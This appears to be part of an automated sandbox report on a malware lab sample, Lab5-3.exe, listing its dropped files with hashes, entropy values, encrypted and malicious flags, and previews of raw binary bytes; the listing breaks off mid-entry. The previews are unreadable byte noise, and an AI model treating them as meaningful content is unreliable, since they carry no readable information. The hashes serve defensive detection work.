                                                                                                          Preview:.(..!P9...%o}..b>k.s0.|...>..F..N..SzMxnt.....BK..3..>6.6...2.L.../F.j..|5...I.. 9.B).BhI...j...7...6m(.Y.]......%./....^T...[...N.....3.....q......HO.....y..z..1...).L.EI..X{....RY........3.s.a@...A"E"..[.-{.+pte2.zF7..1..G.YF6.d...j....=M.6.*J......L..Mb...OP...s.8....x......&...z...U.....P..7.....-_.bW|......L...7.g..i.-.k..v.Q..D....8Q9..i.....Q.[,..t.w.\......7S.}+.3Ez..gp3.v0.l.....~w.W..@.q.$.@..[-...5JVcH...r...+. E=.+.6.K%..5op..^.h/..j....;.@.n.6F....l...P..z.eN......... -..s.%....#...'....kUr..3l.^4..h..{.A......@.}I... ..o..Z...F.F..2.3_M.R....C.J.:P.5D.s-kFt.....BR.hn....8.......j.....r3.~.[....K.K..~...r.b...S.F...H../.....*....i..i>79Ca.t..P?n!...d..(".I.1..C...!..Z\#)..R..Ld....t8...vTNt....W...Tn....z..W.y,...~O...'K...JI`.9e.D.F...7.s.....&..V..dD.v..'i}.........n.G...{...&.w..S+.8.2CB$E..aj...U.~.Bt1.4..oo0j.}/.d....D..(.E.}.ZA..:..#..0`....T...d......nu....);....5.2b...a*...B...z......%..j...r$.P.f/cMP..?......0..R4U...}v6.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2928
                                                                                                          Entropy (8bit):7.934024662309842
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:A7YsFJ9Sg9LuKfSjT1nh+ZeChbymgzkIDDr7FYhxa7CuMFHfUTid3hBaUoSGFcmk:a80pSP1hiRbPgVL7COGx0uKeY2ElUJ
                                                                                                          MD5:E4D630EB7354309E88FBE5C02A3FBE44
                                                                                                          SHA1:29E754287A236F2684404FADE38DD83B1EF4451D
                                                                                                          SHA-256:D68DBDC3B3A75AE40C7BBB7DE29000A274921C8FF248638598C9102E2BA649DB
                                                                                                          SHA-512:ADEFCB58C2E61E60A78C0AE92A7A72FF10EBABDFB87C484FAD1BB1E0F33ADF9AD7732CAB71C8B10EFAEF12EE1AE7D6C183A17F586715D92494D561CB586B13AE
                                                                                                          Malicious:false
                                                                                                          Preview:=..R.].<af.......I.. ....).B&.....~e....I..?..g9w...T..>]....c....{.d...#b.......R.3..D....."..U2.L0..}.e.......}m:....f.co)[*.y.....X..QW7..x/..."..z|....$......(..b..k...j..v..-'..7?.9..E(./f.~.."..........f...H...w..>|H...'."..A.".,K...s[....S".3.....})D5...gk.....U.aQ..Z.f.......y../....Y..=.%.bqVl...$c$]..0..*...Q.....q.I....LQ.&d^/..\.....[.....e.3...i...2.J8q..6...y..9.i.W-..@..0oi9.2^..y=.B..9'.......i..@.i.rl..b..i..u.'C...r...VT....B>...._..../.H....=..4I....hcq..+.'...Z.J.L..?v...55....<.~*.,p.....8.B.-.5.;]u#.<...>3.....91....M.;..C<.yT..!I.]...Y...$0...>....|\.1....a`...v.6....I`.*..+...=a...P...x...>rQ.\..<~k...o"}Y..r?.S.....!.... ..x....<4.=&...v........yK0..8.y.C..7..bn..`.,.............\.......Kw.:..v<..U"....~.y.s.]r.N.4.Y.].6"cn.7..2N./C3.ed<......|......#..*.Cc.G..Na<v......f......^U}..@..J......34I..Ui.....|2.F...........s..d...m..x..3c.9.s\_......L......FQ.._q.xw..i]j.'.hN.o3.Y.....n!r..u.....M.c&K..K]...sa..I.<.aQ
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.933726971713562
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:+bFjJlGx7RgTxClot0pyjhHfUTid3hBaUoSGFcmeykEdEElU92i:MGxKTxClwjiGx0uKeY2ElUJ
                                                                                                          MD5:CF96F40F693088881491AFD7C9978E42
                                                                                                          SHA1:B2145AC5276F1FB2418BD600D31118FF558F2821
                                                                                                          SHA-256:75B667DE18A73BF52E33F16152F75732265FA4191FF394E10FC407FB3D77B33E
                                                                                                          SHA-512:0B1E2E154B971D2689E9C91D5E633BEAF0394A36412839E86023E68EC2B867F525AEF5AF0E1E4FF8463A98186A2E4F5C29774D6C7441C7A906AB20820D161B6D
                                                                                                          Malicious:false
                                                                                                          Preview:F....[.Z.v.....).....V:.Bgm..gJw_...G.0.6...S..d.......C.*.'.-.Uy....S.lg..d.....14.>URLI:G.8mZ.*........c.l>....&).2.&.C%..oan..:~..........v..MH.... ....;..z.;O{.......I....!....+..E... .`.=O.#.Q......3@.5......l...p..&...7q.+...R...p.o..`...y.....:.....i..*.&;.....Zs.xm1.}@m..Z.....$..y.G......r......Y._..._.'..;U...:.....:.i.`.rZ.]R.w...7.tm..Sp.6.nk....[..S...1...b....9...4.....-V=K....X.:0.DiG-p.....`..=....U....Jt.%.u.[l..c..!&.N.)hm].*....0.m.n...xj=...?i...5%..Dgx..D...#.x.3\.I.`...v....b.q.>....R.......Z.*..R-.%@t3.N..h...bf.l.4n......|............%~......F.DPdy.1...f.o......G|.........$.....W...kb..7...l... .%.q......}....G...au.Y._]...[z..L....1u3...5....A....TP.N.1....7.?O..;......L`...@&1.....\>..F..Vg........"..O.....9.,.;^.x.O^s`..m..j.6..{....9.......H%U..DB.zG..!.4N....u'l.C.:..jnb..~Ek.....,..q7s..c..(.....\....}Z.4..........T...i...5.$.h1...[q.F.'2olQ...s..fA..Q..Z...ZJ.......].?.........6......7{[..7y..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1920
                                                                                                          Entropy (8bit):7.886908492563054
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Oi/AhVOXHfUTid3hBaUoSGFcmeykEdEElU92i:is8Gx0uKeY2ElUJ
                                                                                                          MD5:90193F6E6449C00E67F19D812170DDAA
                                                                                                          SHA1:498FA3A2123E978E4885DFA4A03AEF25AF3755F2
                                                                                                          SHA-256:CBBC797E1173C414B4F56A1FD5D0C07C52511EBCB7C1D5A238BABCC8E7EC9D88
                                                                                                          SHA-512:B46F1E5EBCB738F4784DC7692A6D74212C8FA295042B9CFFB889F71F9714542BD67E4A3281C082E86B9CB7A3051D0BA31C0C5E7BBBFCA315AE1C54361C9EE582
                                                                                                          Malicious:false
                                                                                                          Preview:.....eoJy#.B.^E...;.R.is.[.H..}.m`.........._.w..i.._fmb.E...h....b.Q.x@..{2....~.....c.....U.7..H.-.ms.....Q..a......b..(m..De.#,.F.b.MM.N.....-#'...Lu.|.u...|)....N.I......>?.S..N........?Ai..:...#...../.......B...y.&c..g..Xn!..|X...4w.q.w.....o:n...0...O$...._'.."/.=.......#H.......2....'.t6.FN...3-...#.g..u.q.C..F..E....8....c....|.2.8TN.!......P.....z..*...EB*..N.q.@}.L._...........w...8v.....K...h.....6vBgn$...w,.r>..m..O.b^.k.%.....Q..Y.qb....._..|\.r....J...U^w.HO.N..GL.0.bg79l/.80.(....0~.:N....w..uT....G....t..Z.3Kk....=~.z5A{gEo1.Q..0.`.Z.YeB.....e...{?g....`.bd..Q...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2896
                                                                                                          Entropy (8bit):7.942703376385025
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:BbE0RNO5TGiBq9LOCVKR/maDE/K4mPImuHfUTid3hBaUoSGFcmeykEdEElU92i:5HRA/Bq9qKy/fhDBGx0uKeY2ElUJ
                                                                                                          MD5:C6D3F794AEA98655B8B38D410C13BE02
                                                                                                          SHA1:4F6D6D4FB8AEB20CBC2E561A32EDE961B6BAA68B
                                                                                                          SHA-256:BDFA9A8352C3685940B8E290B856CB2D8985BD541467D1EE1EE9E3114480C7D4
                                                                                                          SHA-512:0C91055F399E1164D082D91146B7C0084090F8B8B42599A6CF1B63960731D3CC5E42883C631E56C7F9BAE8439E57BD1ADC1343D59D88DC32AB2674D42144B686
                                                                                                          Malicious:false
                                                                                                          Preview:.#...d..r...s.!.t=C.2..G..Z.El/...mj.*42..Cs$pP.U.0..vf~....{Kq.^..\.........B4.....q...2..r..k|Y.R.[rV.N.....h.8s.H..W.{.|.a.,...g..k.5..8\8....\>....q...t.V..~....z..q.(-......A...1}...7....g{.........q0Cn.8.r.t.#S.......t+..]......s.xz........UZx?>....V?...@...M"...S...^.w.l.........`..+.V1*..y.ES...o...H{M.Ry.YR.....S..<...t..$....xfl.....].oi/.O.>..uD.D..e.[<..O*.}..u. .~R.j#.9.....[._...X../...Mt...$4.U....S*w...Y@.o...R{..$.....!.......Y.l#)9P.(.Z....B.w.D!.q..|1m.Y.-.t.)...N@.X...&G.u&~...<u.,...Qi:*.~..u... *N{.jP....*?.6G...K.'wO2e.Kv...^P]R..>..%.&KN.\5..l.")a.l...{.%A..Y..*a'b0...K.6p.,_n,..p....6..v..[A..P.d...&G./!./.@Q9.H.H.CuE.b.5..:.8*7.0.M...1..?...c..4...B1V(.cYqmwFjL.......=.... ..".........:.7..C.N.7.. .`-.L.qe.....M....[...C..L+P/\...f..b.v......;..Y.p...:.r..,.0.K.).9.92.....~[...[...Z..z..W..S.....$.l.E..=..i../4U....K.l..7..o.2.....v....{.G.![$....Ml.o,.....\6..|W.3A.&......".+^8....O.d.............x....x.*w
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2512
                                                                                                          Entropy (8bit):7.925641272112669
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KXGL/uSOmseqTSjJ2a/HfUTid3hBaUoSGFcmeykEdEElU92i:KXC/5OmseqQ21Gx0uKeY2ElUJ
                                                                                                          MD5:01228FB2DB72FC79E10F1DEDC34E4E97
                                                                                                          SHA1:AC415973B1896F4FDAB4D17F31E55F56F59817E0
                                                                                                          SHA-256:4DCF6161D81670A7898D62FDB916D3F9B2BDD7591D817A51FA7A535AF6A30710
                                                                                                          SHA-512:0F496825249C2482FD67FF8A85AA393356128E71FCE8F32382BB2271F0EC4D000FECB858AC6CED03BEEF12D525A8213C2029C86D1C26788DDDDA41CBB5E15E1D
                                                                                                          Malicious:false
                                                                                                          Preview:.SV[jT....Y...4.$.L......{.....R..,.....J.x...hJ..o.>...'...>T.....O.SV.(..-.cM..+.....c.<.. ......f...9>;.{.I .....r..VRc.i..^.).....J.....w.."2......t\.....xu1W.Zo...6...oz%'_.vP...m@\u.....q..U.n._.:L..]o..})....h......L.|...Y.e...N`>......j.a.H....Nw.....a...{.;...<._G..9.C...Ra..nT,.Kr.Q.._&...w.>*.Z...?....j.dr...G~.GK.\..4. .......1Dd.SC.C.p..J7,[>)KA.T!.;.%.....$...lV.{.t.C/..p..Xau.e.?.... .^.=._yd.q..].....3.\WC..|......g..V.....o.L....Am0Z9a5.V?].o..i.$c.....W...N.K"...W...=.Ou......tg6K......."J........Kdff..C?{.'.0Z..L...z.}.eVJ.U]....N7m..._...o..{.X..+..0..Wf..!...G.3...c........$..hS..H.,...I^%.2.yd}l`....`M....e.8...B.........|UX..Z.Se,.b.......:...k.V.n..u.r=.h&d-.."...=..x.B...i.C.k...O.@"-R....y.M..tIR.-m...Q..Y.!t.\.Gb.T=_r.w.v...e.*W.-+...Z.=..&....<'.3.(@n.e..<.7J.f":\.{.a.E1..Z."..oU......cQ$.]z.....k4....B.+.~...#h..O*.}..$/..n..|....F.?63SUr.......>.c....q...f7\.V.Z..,"....2c.|VB]O2....b.b.#M...l....#..jb.3
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):360913
                                                                                                          Entropy (8bit):7.998747330402799
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:9wEODLP/Z2q9zKSdeUP6X9rPYlwgtVPlyfmFi8BvskPowi/izm2n7u8jCQ+Z:rG5K+e1PwflMq5BvAJ/qn7NQ
                                                                                                          MD5:AF55A5AA7E51F0F9BA47C0A524A41428
                                                                                                          SHA1:CF6D732724B9C7880BE70380679AF7E6CF301B12
                                                                                                          SHA-256:2F00254056E30F714A5413EBC2F5CA3BF98E0D33924851584CB40E5FD24D6E9B
                                                                                                          SHA-512:87E23262D270C4069103FA8F179F2A6D8DC47D89A7C71F58E83CCB92484759B8FC34A5414BB278F926603D9ECD6EFE95D6AC67C79C290B920BF084F4FB82A7F0
                                                                                                          Malicious:true
                                                                                                          Preview:<..g.......$.%W..2&.`...X_"...Y.j$..!.j..qW../....D...+u!.|.r...DUY.R...y..sq...=..7..*..g.....o:+..e.......Jk..L.n....ag..b...Jd..#x.g.h.........{..'.f.&.S..D?B.(.....}..Y...`O.j,.n...{@Y...42.._...CR^<.b/:Ya.m..f...d...?N.....y.....^./.r.:ES.....w....SL....]{.T/*z*A.^?.B7?~h......TV........].i../Y.R..V...z.....o..n.)..........^.o.8Z.{.E..?....\b...S.x<..mK......z.q^I$......F.,SNg:....s...C9.{......o.gd..W..l....C.3t..7.........F.vS.U..--I.zl._wXJ.)..i......Qv;..Or.;....B.......~.C.j._.+.b.f...>u...3.[3..Qw....\..'..t.J.H.i.J..gB._K$..4.SMY....c.`.[...RL..^....~.(..i.......?..tj"........E.5J.:.....M.....k..A...z.....tZ{.Z..fC.c>M.pOG....&.u<_.q..|.4MB.t.....Sf'...*,\...".Sw..$.`.~.'(..:.......G..@6e._.#E.bvON..wXg........I..d....t...x.....Bd.Y.......l...]V...{$0..o....'.B.D/."`L...l.$...tc.N.."qH..l...|J.4|`......!l`!Rkn..(1.T.}..q....Y. d.V.......*th.Q.O..n(..5....e.......L.....S...c.`...'.D....W..K....U\.4:........_k.jBn,...o.{=wQ$.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30880
                                                                                                          Entropy (8bit):7.994786474099569
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:DhGv6s79CDTnS3164qiCwjjc4ijFzuB456KZLquTFVQZ:lGv6W9CH0uirjjc4sSBecupeZ
                                                                                                          MD5:D83958776B2DD295850E9CB8897E1A27
                                                                                                          SHA1:02A4E75627DF944B0855F412FEB54AE7AF31D438
                                                                                                          SHA-256:3C673C67A6DAED0F6323AAD63BC2295D5BC0EE575D407A2D1B6B1799A5C64075
                                                                                                          SHA-512:76E756E2A450A16C609F7CA0873DDA15015AC08689BCDF51AA65147B868D31C880DFC25CC790914610CFD33E8D0BD5EDBF0D6CC7BE893222901AEAAE37CB0A34
                                                                                                          Malicious:true
                                                                                                          Preview:.q./?KO......@..U.z....f{.....I..6A...'..[.....B..$./...G..q..J..m...w.{.\P.TV.5..E..lL.J)? ..g.0..d....Ox.l.b.s.......[.-d....p...P......to.?..4\;....q.zH....Is. .5ITV.A...........T.....o...`~...K...J...^Hv._..[|c.....c..O*.....$.....4.J.`\.......d....)iCo...t..Q...'.pM...I?,..KU.....A.x.~....m..l.....o......=g-U... !.Q$E.uH.p....p...a+.,A.....s.'8G.....{.....f.".C...P.(`....^..+0M..au.Q.../..x.........{..4.D.#B....}...P..77k......XW..R~I......<.l..q..[*.N.hy..?%..`.-:A..6.%Y..6.....m........5....n.\.bdf.N..!.P+M.GRo,....m.A.bB..w....c..12|=;x.)...\.z....NC.F..<..n.p...{p.>.w.|w|._cIg..2:...$_Yu.2...M.H..O.!-...M...jX...&).C./..d...#...].....bf...Yv-*..%,."|....I....nI~....K.G..D..*6qZ.U.=,....7.....2".6...?....H)R..EXNV.."..<..yP.c..43.B\..|..e...`..]y.*>.Zd...;...D...."].t2`..G.6.i...C../.`.S.BRr..K.t....p..Y...b..E.4........5..:a.P.~.4n&&.}.+..].`Y..9.....+..R.....Ai^.u..i..2w.(.Jf...*..wi*Bz..L..x.=.|..N....U23Z~.V........g.T.....;.d,.S..<.V..m.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31344
                                                                                                          Entropy (8bit):7.994541031857083
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:Uqh5lZQIxyZsLHiVmDXp3eFohEmOG5D0Q2kzdQ3pZ:UvZsLHiiZZh/hykJQ5Z
                                                                                                          MD5:ACD361BDB5D0ACA4932C40A04D2D7812
                                                                                                          SHA1:542DBB099B163391E74446331C683D0003D387A3
                                                                                                          SHA-256:FC4BF4B00A8B052D7E6100E9685919B9119BCCC5BEF8A99C3ED603B7368C7FF4
                                                                                                          SHA-512:5FCB74C644E16A3D0914D0F992B58D6ECBD1C753D60C6D18FADEAE3DFAA1914D85E4D8A3F258EAA1C112E40FE65EFDFB5F9DE617679C82DD80E87B235D0D8DA7
                                                                                                          Malicious:true
                                                                                                          Preview:W.Vz.K:.}....6~4,]...A...,.5.#...<..98....At..........f...rEf.(.,#..ri.mC?@?...Wl.A....9.0.....b..U.f..\.>.0T....G.ar..W.".i`.O4Y.4!|...h........a.t1C...f2...k6.Qn......Sn.*Y..vC8Sm.....h.K._..s-$...o....<!.......6.....)......`.|~..`.....B3 ...#..!.7.E.0.kB.E.Y.F....bS..;.........:i..gl.z..b..z...r....P.2.'..H..4$?..b..{.....j...N..y..Z..f....,.S...$;K%....l.....m.W..........r..~..e.+D......."..Y...&.(...I..S.2.4yw..b..O$.e./....De...4z.......h..M....{.O2.YyQf............c..Y.pPC+q...5u:.......h......R...%.-.!.WB...}H..o.).lK....K......@..-..1&.`..m6/.G...F..`,.w.4%.4.....M...H....C[..s..D....]yzD.Za........q.%.|....\r...Z..2........D.b..>..Ny...+.0....(..x......F.V.'....).]..Eb...%...q5..Y...9.V. Y.48.B..........6....k..H...L7-.p.M.J.~..Xi.8.1.xV...w...5r.P_%..).U.....gDC.H..p].p.T..Ck..E.[+.{..t.^..B|yP..j.W....w...p...R.b:mb..I..n.........@.f/.d.n....$........4..U.1..U.fb.....r.....,N.}....~...k. ..c.. ..r.J....|.9...}.{.@.60.w
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):34464
                                                                                                          Entropy (8bit):7.994781918193802
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:hBlHWc1oKaCyNFnn9BtJFWfBi5hXdGc63RpaGdo58NW/Z:HlHWcq3n9rJQ87Iz3RpaI4cW/Z
                                                                                                          MD5:757B3B41F504C6B7374327593268F92B
                                                                                                          SHA1:36DC151439F3A4373C548275C8551691BB2D0FF3
                                                                                                          SHA-256:00236978AC6C8D1FA3836811D82617B95858F9ECE6383612CCF848D82FDC1064
                                                                                                          SHA-512:854D9E260CE08CFF315963693FCDE3227F7AAFF87CCC6BE094FCE06796E4FA8F1873BB74404BDFA46D57A35FA06B1EFBB2D648600CF11F65C3EE3D36A51164D3
                                                                                                          Malicious:true
                                                                                                          Preview:..,..3.n.....gq.....RP.DABb......vH.;..n.....Z.......s..#.XN.."j..5)yJ..{...p..Ms..K.V.....CFc.._.NM.......)..o.D...8dp..._....a.....=..5pGT..f..g....b`.X.'z.sz.&.....u&1S.=....Ll.*.....b{.B.SE..N..x....!k.s..[..Z..q..g$N.;st..&[I..a.c.6.5Y.{...+/.S.'.......5..K.+*..Q..C........D.h.1'..u1..J.....B.....ii(x.UZ....*'%.........^.p..}.XY.L.......5.....-..U.O.......\.i.K....L9..S.....d.`......$3....<..q..6.x.......4.p..\.V.....d..C....yz.3..x. .<b.c.t.Ma..c.k.!.......l#.Bc.....A..0../=T........F......._.......u@....B..T.)..dC..0F.........tJ.9U.9.. ....<......._b...LkL^.f.$..6.\.U.n..;>bz.....f..........GS.....^..U...'.j..<.H9.......I.Il.;...>.t...:...K.......h.....)IQ...\..C..A........Y.2...s.L.....>....T.E.!j.P#...@.vW..i.l........(n.....m....4.......6Tu..\.y...:.}XJ.k..9E....?M......6.}...F.#.%.....>..........A.$..e.JPXgM......@.Z>..q}..erm.....Y. Qm#.!G....._..&.8...TY....@Mr..Tv..1A.C.hh...F..Ey..K ...c..X..l...$.#C... .....B!S..@.ev.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31328
                                                                                                          Entropy (8bit):7.994126863771758
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:JLsf+n4EfsCbnJwOpf7ReOS6au5zh0izRyZMY3RztY0hLdvSZ:g+4E99jRnZ5wWRVY3LYsSZ
                                                                                                          MD5:F04E5D75E756802C4478BC17C93751A4
                                                                                                          SHA1:2525228D7DA62EFEEB2694D6E8654224BD0BB45A
                                                                                                          SHA-256:2B622656B527EE7621D017B0426C379BADD23E5D5012DCF91355471B219082FA
                                                                                                          SHA-512:E594AC5BA726F55B9E02BD43A96F600C98D44C3C666BBFACDFD7439CD6D50A37BD6015ECFD21EBD4ECEA3E245CA4A7452807A174177E94841916F8B10276BFFD
                                                                                                          Malicious:true
                                                                                                          Preview:...4'.A...&7Vm..N....zgtld..d..N....jk....Pw....5R8|'?1<x..........W...E...n7>H-..y;.r..X.wtU..U...8.+*X.]2.=..m.....Q|.......;s..?.t.d......e.H.4Wt;;....fJ.k..&.6.....&m.W..Xd>t9...g....nE$.h..s8....0...w.b.n..nv..l|....?...sN..0..n.k..%...,....f.....rQ..L .kS...:....SD........u.`..9....!i.......r9.2...(.u...c.3U....b...a{y.s6..o..p.m.A.M.P..r.cA.O^....(. 8. 0&<..v......u;=....B....F?.....d/....c...%T..Z(PE.... ...0.,..%.....r.c?....}..k.h`..`...Z`..&t..q......(....p......R.....o^..M.k.>_.....|.W,8q.s.$.h...m.\.l..s.........../.o.1..N...hL,........S?r4.`.x.+,.)A4..6m."..w&...K...7>..Z...~a!.....B[..(...e6.H.X.h......2.!. yp....p....|.h2..e.xY'..&...w....leT.?.J.D......>....s.$M.{..}rZE^.,.l.c..+.....c..n`%.'.......;E....u.yPX....9{p......^,.a.t]hY<TKT.G....j7..I.....S.4.A.7m....@.......^..6....q.3c..:.<r.]._@.a......H....'>23./.L...*....'\hz._......5E..r.....Yq....&8......'.i...EM.!.`H.],..5.T..-$....N.pPW.5i.........bj........=..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31312
                                                                                                          Entropy (8bit):7.992967242426741
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:wxk5Du16YSfmhBgjj/yhbc/SKi3zsXc/nIOwOP59BlsZ:wyDuoJmjCjah0sAXcAORBeZ
                                                                                                          MD5:4BCA023C11BB2B2B70DC26EC0342F9A2
                                                                                                          SHA1:B2F6383A99AAF40024436CA3A5E7C5C30705EC70
                                                                                                          SHA-256:ED03B8FB154FCA8FDA4EAD0392FD93633D4DAC7785983FE65DD3AD2E5740629F
                                                                                                          SHA-512:DB8C64329AD6733CBCD8B7E19F323810A6F2EC8DF3083ADBA194F44C2939693F4046C66B1B3844F5B5192DCE0EF3A27D1B8D18E8E41CFA5E4BD24B6434DA74FE
                                                                                                          Malicious:true
                                                                                                          Preview:q.M...[..T .x.Da..Q....a/3]_.V.,.X.V...Gb4f..p.9....(.E.I...j..2....0..`...t..i..J....G&....z..l... .s..|.v..4..z....,V.Ood.+`7...V..).d.>=..T..J.......Gi.S.a.._.......e.5....j$0..|.e....|.fq...|..?Z..[..k\-....u..~...i[!.J..>..!..K...<N.v....G..6E..d... .R......c.._..|P.d....}..Qs3.d.".z.9.+[... .|...A#...i.[L6x.q_.bC..H,...'..&..XGmbl...5.......DB..G.).O.e.^....y.\.........B..E..c..U.....B.....%O=.sK*S.......1..\..)FM.3.....TR..0.#..u........].......hs.hT..b......h.Z.5|......o.#.@.W.....@..0<.Ueb......R..W..<.R.v#g.a.I...R....;....Mf.....D....5...v..Nvr!l.G).[U....O.o..........I......0....i....&A-..~|.&.......oY.h..!.Z!.:)...r....%.....'.(Tc7......7...i..a8`.C1t.'.|.".S;.&......~..#..Z$..y<..O uX...R..M....C....]jDD.......4.(o2..[....H=.x./H...).....7...;.9.8.%...r.!..J.....D...l.)H.<;...A...v....<..hP.p.D........z.-/p..c.....c.I._b.......5d..M?./..dv......te..k..j..@[~?/...<....j..gs.............H.v...*.".n..b:.zY.....D...1.]
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28256
                                                                                                          Entropy (8bit):7.993145501004027
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:Lz4RqpGuGw/qrT8f6ac1U+Bi6tVxtcQCDPZ:f9plGprD3O+pfcbDPZ
                                                                                                          MD5:EC24098EE4F532623254D296DEC4B61F
                                                                                                          SHA1:5909EC5B5D1B4F3DEBBE2DD9354D91A477732770
                                                                                                          SHA-256:EE1065626FC6F3EDE244489F2C7565C9640994E9104686ED80E9594DC364670A
                                                                                                          SHA-512:380DDA3ACA69D9AF0EA0379873DDE5954C375C29FC7900BD3C4BFDDDD480A39CFBCE5949105BDEE86ED1A1D0F4E0CF1B2FFA95EA7AA7338E5DDD0DD001751C81
                                                                                                          Malicious:true
                                                                                                          Preview:q..s..^..H8.t.D...r..]."G..N.Kcp...+..uXyJ......E$.yo....&].$..........g.u0^.....(u.6...(.L..9...NO...{./f.......h...gvL_.D]W.d.I%.r...1.'../...).......=.c...]..u:i.i\.9WKC%.R..'+@.Su..8\!6.U.,..18@..!H....W!..!...R`A ....B.Z.."....*.|me....@...w..8.].....T.....b..:.D.@'QY..NY..D...2...t%...0......{....n.(J...s.P.!9qU.....V..+F.b..gEX6.....W..y6../:..F..F...3..../.v4..pC..u...N.~.W.1...T......OU....U"....)k.1.5.......a..H..'.7.A. .d....roe?...s.K../.AE.:G:....L...i~$"..]V.z>X.S........,.......D.^.aH.9...............5|Z....~9a.ZE..^/)^..Q..8-2...=V..z.....`.....Xv.7.nLGQ.P0X,..(..r......j.d_..h3CEZ`...{............?..m/.G...zBM3.....E........y^.O.....a......7.,[.|....8KE. f\.3..=HV.......\[.d1.e.....y'..;.0.2b.8.^.....5.....>z.....&.n.."].Eq(-PL.'.*..=Zx.0.=r.....6..7..%l'.Z&>.......6*....6.4....i..D...E.Z..T.QB.Y.....Q.([.....6.D...dnc.....G.]..e.m.g.j........s..@7.#.!...!O/k&.s.W..S.p.z.M=_..=...{l.`....z.5.|..../..w.V*.?
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31904
                                                                                                          Entropy (8bit):7.993380449049336
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:0pl/dLB8ao8AuvtoM5bQ1RZvKoCC95fKkAF4a2MmeQZKDZ:0jNBH1vloD93B5fKkAFPBpDZ
                                                                                                          MD5:AF06BB8487F1507542E1D053A983DAE0
                                                                                                          SHA1:C3DA2F8B07531F19AAE7EAA9C550891D82B9020A
                                                                                                          SHA-256:1D3AFAFF5758B98BFBB9722C19B051A92BF5123C9FA02EDDC12AC6A952187C27
                                                                                                          SHA-512:782E9A7011B44CAC6BB06F6E4EFAC10A6C8638C880570023DBC10192BBAE6BE273C27D01DF2BF04E93E03DCBFA23D4BBDB72FA29309F9DDBE8923D8B7C2F2A28
                                                                                                          Malicious:true
                                                                                                          Preview:T...'`.A5r....&~..U#..7.O....x.fk..d..T(.$.Q....!#...M......Z.+7..S.2>....{.-.....&=.}g.{...z./l..N.i.....}@.......>9......6.;L.y.z..........pU)....a..q... X:..%3:Q...9..A_.YS)y4_..+....g...n.....t.lS....@......O.).s..uk..5.x.i...zYS'B^%..N....A.<..i.d.2...(..^.B._....g.5......4.,b.1.m.w....)...E...G.6......*..tr.8MY.......\p...`.?5"....T2...m(..z...DS............z......L&m+....?..7..%<jJ...[L....q*...<.+....."...s...d..0.k..v..pg=.Cky..... ..7...i;......E<0 Q2vz.....i..J^r...'.o..#v.eRg/+3.........T6-..n.|..B.lA..G....*P.B`.QR.iP*HI.."o...r..~Nt82$.......+t.3.....]...b._W-LD.g[.A..2...E.!9...Odj*P..;~_....L..G..l]..!.......]...XI..>.M..R..l..].P....^...p}....WXO...:5........ D.....T9.WN.$.nshLs.P.c..4.Q...}h....M....8.m..U[9.....7..u;%F=.O..c_1.c..&Tp...BP.mC..`L<h.,.w.V.....)..O..tH/&9s.h.Ya....'..O.`(.4..k..a.V...-E..\.> J.O...M?...] .@.....1...7.......l.8<..w..m~X...ji.....Tt....xtM%P..F..M./P.#....&..w.V..bn....`-..$#j.....D..mD...[
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):26624
                                                                                                          Entropy (8bit):7.992744034145015
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:VNp4PlnTJ814R9mQot9Y0pDA1SRCAry6vPreLT19KKF83ekRrcAfUnfarVtb:94Pq7bLpDOSQAtr+x97FWVlsnyZ
